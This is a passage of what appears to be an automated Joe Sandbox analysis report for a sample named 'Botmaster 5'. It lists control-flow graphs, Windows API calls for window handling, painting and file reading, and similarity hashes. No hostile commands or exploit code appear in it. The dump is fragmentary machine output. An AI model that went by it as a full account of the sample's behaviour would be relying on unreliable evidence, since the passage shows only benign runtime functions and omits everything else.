3034->3033 3035->2992 3050 424e6b 3035->3050 3036->2987 3052 424b98-424b99 SetFocus 3037->3052 3053 424b9f-424bb3 call 4258f1 3037->3053 3038->3029 3039->2985 3040->2987 3044 424e10-424e12 3041->3044 3045 424e14-424e17 3041->3045 3055 424dff-424e04 call 42560f 3042->3055 3046 424c49-424c4e 3043->3046 3047 424bf9-424bfa 3043->3047 3044->3055 3045->3040 3058 424c50-424c62 call 4258f1 3046->3058 3059 424c65-424c69 3046->3059 3056 424c34-424c47 3047->3056 3057 424bfc-424bfd 3047->3057 3060 424d62-424d69 3048->3060 3061 424d5c-424d5f 3048->3061 3049->3048 3050->2982 3052->3053 3053->3029 3055->2987 3056->3036 3066 424c08-424c2f call 4258f1 * 2 3057->3066 3067 424bff-424c06 3057->3067 3058->3059 3069 424c6a 3059->3069 3060->2987 3070 424d6f-424d75 3060->3070 3061->3060 3066->2987 3067->3069 3069->3036 3070->2987
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 0042516E: SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 004251BF
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetWindowRect.USER32(?,00000010), ref: 004251E7
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetWindowRect.USER32(?,00000020), ref: 004251F0
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetSystemMetrics.USER32(0000003D), ref: 00425200
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetSystemMetrics.USER32(0000003E), ref: 00425207
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetWindowLongW.USER32(?,000000F0), ref: 00425211
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetSystemMetrics.USER32(00000005), ref: 00425220
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetSystemMetrics.USER32(0000002E), ref: 00425240
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetSystemMetrics.USER32(00000022), ref: 0042524F
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetSystemMetrics.USER32(00000023), ref: 00425256
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetSystemMetrics.USER32(0000003B), ref: 0042525D
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetSystemMetrics.USER32(0000003C), ref: 00425264
                                                                                                                                                                                                                    • Part of subcall function 0042516E: SendMessageW.USER32(?,00000024,00000000,00000034), ref: 00425279
                                                                                                                                                                                                                    • Part of subcall function 0042516E: GetKeyState.USER32(00000001), ref: 0042527D
                                                                                                                                                                                                                    • Part of subcall function 0042516E: SendMessageW.USER32(?,00000201,00000001,00000000), ref: 00425293
                                                                                                                                                                                                                    • Part of subcall function 0042516E: SetCapture.USER32(?), ref: 00425298
                                                                                                                                                                                                                    • Part of subcall function 0042516E: PostMessageW.USER32(?,00000231,00000000,00000000), ref: 004252A8
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_WindowID), ref: 00424AAC
                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00424ABC
                                                                                                                                                                                                                  • GetPropW.USER32(?,PB_Focus), ref: 00424B8E
                                                                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 00424B99
                                                                                                                                                                                                                  • _strftime.LIBCMT ref: 00424BAB
                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00424BB5
                                                                                                                                                                                                                  • SetPropW.USER32(?,PB_Focus,00000000), ref: 00424BC4
                                                                                                                                                                                                                    • Part of subcall function 00425717: SendMessageW.USER32(00000001,00000129,00000000,00000000), ref: 0042572E
                                                                                                                                                                                                                    • Part of subcall function 00425717: SendMessageW.USER32(00000000,00000128,00030001,00000000), ref: 00425756
                                                                                                                                                                                                                    • Part of subcall function 00425717: InvalidateRect.USER32(00000000,00000000,00000000,?,?,?,0042493E,00000000,?,?,?,?,00000001), ref: 0042575D
                                                                                                                                                                                                                  • _strftime.LIBCMT ref: 00424C1B
                                                                                                                                                                                                                  • _strftime.LIBCMT ref: 00424C27
                                                                                                                                                                                                                  • _strftime.LIBCMT ref: 00424C6C
                                                                                                                                                                                                                  • GetClientRect.USER32(?,00000000), ref: 00424C8A
                                                                                                                                                                                                                  • FillRect.USER32(?,00000000,?), ref: 00424C9A
                                                                                                                                                                                                                  • _strftime.LIBCMT ref: 00424CC9
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: System$Metrics$MessageRect_strftime$Send$PropWindow$Focus$CaptureClientFillInfoInvalidateLongParametersParentPostState
                                                                                                                                                                                                                  • String ID: PB_Focus$PB_WindowID
                                                                                                                                                                                                                  • API String ID: 54628344-3744720988
                                                                                                                                                                                                                  • Opcode ID: 9ab02f8df00f252774b2fd1c45447e34874e63999f279dcd98f7f13a6e1ea2ef
                                                                                                                                                                                                                  • Instruction ID: 70ec7af560c5503971c1190a1851f1c0ae7862d2736eb539a9c0cb0990a13988
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ab02f8df00f252774b2fd1c45447e34874e63999f279dcd98f7f13a6e1ea2ef
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70D12130700225ABDF219F55ED44BBB7A64FFC4300F92401BF90996690E779DE60DB5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041FDB4 Relevance: 30.3, APIs: 20, Instructions: 266windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 3184 41fdb4-41fde1 GetWindowLongW call 427eaa 3187 41fde7 3184->3187 3188 41ff9b-41ffa1 3184->3188 3191 41ff39-41ff3e 3187->3191 3192 41fded-41fdf2 3187->3192 3189 41ffa7-41ffad 3188->3189 3190 4200b5-4200c3 SetCapture 3188->3190 3195 4200a3-4200a8 3189->3195 3196 41ffb3-41ffb9 3189->3196 3194 4200c9-4200db CallWindowProcW 3190->3194 3193 41ff44-41ff65 3191->3193 3191->3194 3197 41fdf8-41fdfb 3192->3197 3198 41ff2b-41ff34 call 41fd52 3192->3198 3202 41ff80-41ff96 ReleaseCapture call 4235da 3193->3202 3203 41ff67-41ff6b 3193->3203 3205 4200e1-4200e5 3194->3205 3195->3194 3204 4200aa-4200b3 ReleaseCapture 3195->3204 3206 42009e-4200a1 3196->3206 3207 41ffbf-41ffc5 3196->3207 3199 41fe01-41fe04 3197->3199 3200 41ff14-41ff26 RedrawWindow 3197->3200 3198->3194 3209 41fe0a-41fe0f 3199->3209 3210 41ffef-41fff2 3199->3210 3208 42009a-42009c 3200->3208 3202->3194 3203->3202 3212 41ff6d-41ff74 3203->3212 3204->3194 3214 42008d-420092 call 4235da 3206->3214 3215 41ffcb-41ffd1 3207->3215 3216 42007e-420086 3207->3216 3208->3205 3219 41fe11-41fe12 3209->3219 3220 41fe26-41fe33 3209->3220 3223 420001 3210->3223 3224 41fff4-41ffff BeginPaint 3210->3224 3212->3202 3226 41ff76-41ff7a 3212->3226 3214->3208 3217 41ffd7-41ffdd 3215->3217 3218 42006a-42007c call 4235da 3215->3218 3221 420094 3216->3221 3222 420088-42008a 3216->3222 3217->3194 3228 41ffe3-41ffe9 3217->3228 3218->3208 3229 41fe14-41fe15 3219->3229 3230 41fe1e-41fe21 3219->3230 3233 41fe35-41fe3b call 426172 3220->3233 3234 41fe3e-41fe41 3220->3234 3221->3208 3222->3214 3231 420004-42000b 3223->3231 3224->3231 3226->3194 3226->3202 3228->3194 3228->3210 3229->3220 3237 41fe17-41fe18 3229->3237 3230->3205 3231->3208 3238 420011-420016 3231->3238 3233->3234 3240 41fe43-41fe4d call 425ecc 3234->3240 3241 41fe5c-41fe6c call 41fd52 3234->3241 3237->3194 3237->3230 3243 420055-420059 3238->3243 3244 420018-42001d 3238->3244 3240->3241 3255 41fe4f-41fe59 call 425fae 3240->3255 3252 41fe72-41fe7c GetObjectType 3241->3252 3253 41ff0c-41ff0f 3241->3253 3243->3208 3250 42005b-420068 EndPaint 3243->3250 3248 420032-42004f GetObjectType DrawStateW 3244->3248 3249 42001f-420030 call 426184 3244->3249 3248->3243 3249->3243 3250->3208 3256 41fe8d-41fe9a GetIconInfo 3252->3256 3257 41fe7e-41fe8b GetObjectW 3252->3257 3253->3205 3255->3241 3261 41febb-41fed1 GetWindowLongW 3256->3261 3262 41fe9c-41feb9 GetObjectW DeleteObject * 2 3256->3262 3257->3261 3263 41fed3-41fed6 3261->3263 3264 41feda-41fef6 SetWindowPos call 425ecc 3261->3264 3262->3261 3263->3264 3264->3253 3267 41fef8-41ff06 InvalidateRect UpdateWindow 3264->3267 3267->3253
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F4), ref: 0041FDC3
                                                                                                                                                                                                                  • GetObjectType.GDI32(?), ref: 0041FE73
                                                                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0041FE85
                                                                                                                                                                                                                  • GetIconInfo.USER32(?,?), ref: 0041FE92
                                                                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0041FEA5
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041FEB4
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041FEB9
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041FEC9
                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 0041FEE6
                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000,?), ref: 0041FEFD
                                                                                                                                                                                                                  • UpdateWindow.USER32(?), ref: 0041FF06
                                                                                                                                                                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000101,00000000), ref: 0041FF20
                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 0041FF83
                                                                                                                                                                                                                  • BeginPaint.USER32(?,?,00000000), ref: 0041FFF9
                                                                                                                                                                                                                  • GetObjectType.GDI32(?), ref: 00420033
                                                                                                                                                                                                                  • DrawStateW.USER32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,-0000000B), ref: 0042004F
                                                                                                                                                                                                                  • EndPaint.USER32(?,?,00000000), ref: 00420062
                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 004200AD
                                                                                                                                                                                                                  • SetCapture.USER32(?,00000000), ref: 004200C3
                                                                                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004200DB
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ObjectWindow$Capture$DeleteLongPaintReleaseType$BeginCallDrawIconInfoInvalidateProcRectRedrawStateUpdate
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1726065345-0
                                                                                                                                                                                                                  • Opcode ID: ccc618ba7f395247c38ac23ee2002774c077ac694c99173a748753692b52d5c1
                                                                                                                                                                                                                  • Instruction ID: 9eb8b0f9abe6889680bb33a97e6cdf9128dc135f8e7165166468c2ac8350c92c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccc618ba7f395247c38ac23ee2002774c077ac694c99173a748753692b52d5c1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61910630600214ABDB318F25FC48ABF3BB9FF85701B40413BF50296162D7B99D82DB5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004242C5 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 251memoryregistryCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 3268 4242c5-4242e2 3269 4242e4-4242e9 call 424fb1 3268->3269 3270 4242ee-424302 call 427e22 3268->3270 3269->3270 3274 424304-42430a 3270->3274 3275 42430f 3270->3275 3274->3275 3276 42430c-42430d 3274->3276 3277 424312-424329 call 431fc0 3275->3277 3276->3277 3280 424332-42438a memset RegisterClassW 3277->3280 3281 42432b 3277->3281 3282 42438f-42439d 3280->3282 3283 42438c 3280->3283 3281->3280 3284 4243a1-4243a7 3282->3284 3285 42439f 3282->3285 3283->3282 3286 4243b4 3284->3286 3287 4243a9-4243b2 3284->3287 3285->3284 3288 4243bb-4243be 3286->3288 3287->3288 3289 4243c0-4243c8 3288->3289 3290 4243cf-424411 AdjustWindowRectEx 3288->3290 3289->3290 3291 424413-424416 3290->3291 3292 424418-42441b 3290->3292 3291->3292 3293 424425-424428 3291->3293 3292->3293 3294 42441d-424422 3292->3294 3295 424461-424464 3293->3295 3296 42442a-424435 GetSystemMetrics 3293->3296 3294->3293 3299 424466-42446b 3295->3299 3300 4244b7-4244eb CreateWindowExW 3295->3300 3297 424437 3296->3297 3298 42443a-42444f GetSystemMetrics 3296->3298 3297->3298 3303 424451 3298->3303 3304 424454-42445f 3298->3304 3305 424477-4244ab GetWindowRect 3299->3305 3306 42446d-424475 GetActiveWindow 3299->3306 3301 4244f1-424505 SetPropW 3300->3301 3302 4245ac-4245cd UnregisterClassW call 427f10 3300->3302 3308 424507-42450d 3301->3308 3309 424529-424598 HeapAlloc CreateAcceleratorTableW 3301->3309 3318 4245cf-4245d3 3302->3318 3303->3304 3304->3300 3310 4244af-4244b1 3305->3310 3311 4244ad 3305->3311 3306->3300 3306->3305 3314 424513-424519 3308->3314 3315 42450f-424511 3308->3315 3316 4245a1-4245a6 3309->3316 3317 42459a-42459c call 4321c6 3309->3317 3310->3300 3313 4244b3 3310->3313 3311->3310 3313->3300 3320 42451b-42451d 3314->3320 3321 42451f 3314->3321 3319 424521-424523 ShowWindow 3315->3319 3316->3318 3323 4245a8-4245aa 3316->3323 3317->3316 3319->3309 3320->3319 3321->3319 3323->3318
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00424339
                                                                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 0042437E
                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,?,00000000,?), ref: 004243EF
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0042442C
                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 00424446
                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042446D
                                                                                                                                                                                                                  • GetWindowRect.USER32(00000010,?), ref: 0042447C
                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,00000010,00000000,00000000), ref: 004244DF
                                                                                                                                                                                                                  • SetPropW.USER32(00000000,PB_WindowID,00000100), ref: 004244FC
                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000001,?,?,?,?,?,00000001), ref: 00424523
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,0000000C,?,?,?,?,?,00000001), ref: 00424548
                                                                                                                                                                                                                  • CreateAcceleratorTableW.USER32(?,?,?,?,?,?,?,00000001), ref: 00424585
                                                                                                                                                                                                                  • UnregisterClassW.USER32(?), ref: 004245B9
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$ClassCreateMetricsRectSystem$AcceleratorActiveAdjustAllocHeapPropRegisterShowTableUnregistermemset
                                                                                                                                                                                                                  • String ID: PB_WindowID$WindowClass_%d
                                                                                                                                                                                                                  • API String ID: 3388888743-2937193648
                                                                                                                                                                                                                  • Opcode ID: f8c3f20f76dfcf8cb19a8a3353b963f88ed9460b7d17f5d73efe978aee73a589
                                                                                                                                                                                                                  • Instruction ID: 327cb529d6adfd8b8bb482b10843d6415dc6b28d91832ad7c2639c896330e7e6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8c3f20f76dfcf8cb19a8a3353b963f88ed9460b7d17f5d73efe978aee73a589
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9A18C71A0021ADFCB10CFA8ED85B9EBBF4FF44344F54422AF955A32A0D7B89950CB59
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00424104 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 76memorywindowCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 3324 424104-424120 call 427eaa 3327 4241f6-4241f8 3324->3327 3328 424126-424132 GetWindow 3324->3328 3329 424141-42415d RemovePropW * 2 3328->3329 3330 424134-424138 3328->3330 3332 424167-42416c 3329->3332 3333 42415f-424161 RevokeDragDrop 3329->3333 3330->3329 3331 42413a-42413b SetActiveWindow 3330->3331 3331->3329 3334 424180-424197 KiUserCallbackDispatcher call 431fc0 3332->3334 3335 42416e-42417e SendMessageW 3332->3335 3333->3332 3338 42419c-4241ac UnregisterClassW 3334->3338 3336 4241b2-4241b7 3335->3336 3339 4241d1-4241d6 3336->3339 3340 4241b9-4241cb HeapFree DestroyAcceleratorTable 3336->3340 3338->3336 3341 4241d8-4241d9 DeleteObject 3339->3341 3342 4241df-4241f1 call 425a28 call 427f10 3339->3342 3340->3339 3341->3342 3342->3327
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000004), ref: 0042412A
                                                                                                                                                                                                                  • SetActiveWindow.USER32(00000000), ref: 0042413B
                                                                                                                                                                                                                  • RemovePropW.USER32(00000000,PB_WindowID), ref: 0042414F
                                                                                                                                                                                                                  • RemovePropW.USER32(00000000,PB_DropAccept), ref: 00424158
                                                                                                                                                                                                                  • RevokeDragDrop.OLE32(00000000), ref: 00424161
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000221,00000000,00000000), ref: 00424178
                                                                                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00424182
                                                                                                                                                                                                                  • UnregisterClassW.USER32(?), ref: 004241AC
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 004241C2
                                                                                                                                                                                                                  • DestroyAcceleratorTable.USER32(?), ref: 004241CB
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004241D9
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: PropRemoveWindow$AcceleratorActiveCallbackClassDeleteDestroyDispatcherDragDropFreeHeapMessageObjectRevokeSendTableUnregisterUser
                                                                                                                                                                                                                  • String ID: PB_DropAccept$PB_WindowID$WindowClass_%d
                                                                                                                                                                                                                  • API String ID: 3636796199-976223216
                                                                                                                                                                                                                  • Opcode ID: f6f36b73b9db567f888ba9ec81bdde63d98d799a79e4b88e99b11cc00826ed0b
                                                                                                                                                                                                                  • Instruction ID: 6e5fc0946f00e7a395c5f6497eb0e83fa8e0a9ddecac9347fe6db61c28e46ab1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6f36b73b9db567f888ba9ec81bdde63d98d799a79e4b88e99b11cc00826ed0b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50218B31600210BBDF216F61EC0DF2A7BB9EF54B40F104426F941A2174EBB6AC61DF5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040FCAE Relevance: 24.3, APIs: 16, Instructions: 306memoryfileCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 3346 40fcae-40fcc4 call 410024 3349 40fcc6 3346->3349 3350 40fccd-40fcf7 CreateFileW 3346->3350 3349->3350 3351 40fcf9-40fd12 CreateFileW 3350->3351 3352 40fd3d-40fd57 GetFileSize 3350->3352 3353 40fd14-40fd25 CreateFileW 3351->3353 3354 40fd2a-40fd37 3351->3354 3355 40fda7-40fdac 3352->3355 3356 40fd59-40fd71 ReadFile 3352->3356 3353->3354 3354->3352 3357 40ffbc-40ffee wcslen HeapAlloc 3354->3357 3360 40fdb2-40fdc3 3355->3360 3361 40fe7b-40fe82 3355->3361 3358 40fd73-40fd87 memcmp 3356->3358 3359 40fd98-40fda1 SetFilePointer 3356->3359 3362 40fff0-40fffa wcscpy 3357->3362 3363 40fffb-410004 3357->3363 3358->3359 3365 40fd89-40fd96 3358->3365 3359->3355 3366 40fe51-40fe5e HeapAlloc 3360->3366 3367 40fdc9-40fdd6 HeapAlloc 3360->3367 3361->3363 3364 40fe88-40fea6 3361->3364 3362->3363 3364->3363 3369 40feac-40feb0 3364->3369 3365->3355 3366->3363 3368 40fe64-40fe78 ReadFile 3366->3368 3367->3361 3370 40fddc-40fdf7 HeapAlloc 3367->3370 3368->3361 3372 40feb2-40feb4 3369->3372 3373 40feb6-40feb7 3369->3373 3370->3363 3371 40fdfd-40fe30 ReadFile call 429d20 3370->3371 3376 40fe35-40fe4f HeapFree 3371->3376 3372->3373 3375 40feb9-40febd 3372->3375 3373->3369 3377 40fef6-40fef8 3375->3377 3378 40febf-40fec3 3375->3378 3376->3361 3379 40fefa-40ff0d call 40fc7e 3377->3379 3380 40ff3c-40ff3e 3377->3380 3381 40fec5 3378->3381 3382 40fec6-40fed8 call 40fc7e 3378->3382 3394 40ff1e-40ff20 3379->3394 3383 40ff40-40ff42 3380->3383 3384 40ffa4-40ffa8 3380->3384 3381->3382 3392 40feed-40feef 3382->3392 3383->3384 3387 40ff44-40ff46 3383->3387 3389 40ffa3 3384->3389 3390 40ffaa-40ffac 3384->3390 3393 40ff57-40ff59 3387->3393 3389->3384 3390->3389 3395 40ffae-40ffb4 3390->3395 3397 40fef1 3392->3397 3398 40feda-40fede 3392->3398 3399 40ff48-40ff4a 3393->3399 3400 40ff5b-40ff5e 3393->3400 3401 40ff22-40ff25 3394->3401 3402 40ff0f-40ff13 3394->3402 3395->3369 3396 40ffba 3395->3396 3396->3363 3403 40ffa1 3397->3403 3398->3403 3404 40fee4-40fee6 3398->3404 3399->3400 3405 40ff4c-40ff4e 3399->3405 3408 40ff6d-40ff6f 3400->3408 3401->3403 3407 40ff27-40ff29 3401->3407 3406 40ff15-40ff17 3402->3406 3402->3407 3403->3389 3404->3403 3412 40feec 3404->3412 3405->3400 3413 40ff50-40ff52 3405->3413 3406->3401 3414 40ff19-40ff1b 3406->3414 3409 40ff33-40ff38 3407->3409 3410 40ff60-40ff65 3408->3410 3411 40ff71 3408->3411 3416 40ff3a 3409->3416 3417 40ff2b-40ff2d 3409->3417 3420 40ff67-40ff6a 3410->3420 3421 40ff6c 3410->3421 3415 40ff74-40ff79 3411->3415 3412->3392 3413->3400 3418 40ff54-40ff55 3413->3418 3414->3401 3419 40ff1d 3414->3419 3415->3415 3423 40ff7b-40ff7d 3415->3423 3416->3384 3417->3389 3422 40ff2f-40ff31 3417->3422 3418->3393 3419->3394 3420->3411 3420->3421 3421->3408 3422->3384 3422->3409 3423->3415 3424 40ff7f-40ff90 call 40fc7e 3423->3424 3427 40ff9d-40ff9f 3424->3427 3427->3403 3428 40ff92-40ff96 3427->3428 3428->3403 3429 40ff98-40ff9a 3428->3429 3429->3403 3430 40ff9c 3429->3430 3430->3427
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000), ref: 0040FCED
                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000000), ref: 0040FD08
                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000), ref: 0040FD23
                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040FD3F
                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000003,?,00000000,?,?,00000000), ref: 0040FD6C
                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040FD7D
                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,?,?,00000000), ref: 0040FDA1
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000), ref: 0040FDCF
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00000000), ref: 0040FDEE
                                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,00000000,?,?,00000000), ref: 0040FE0E
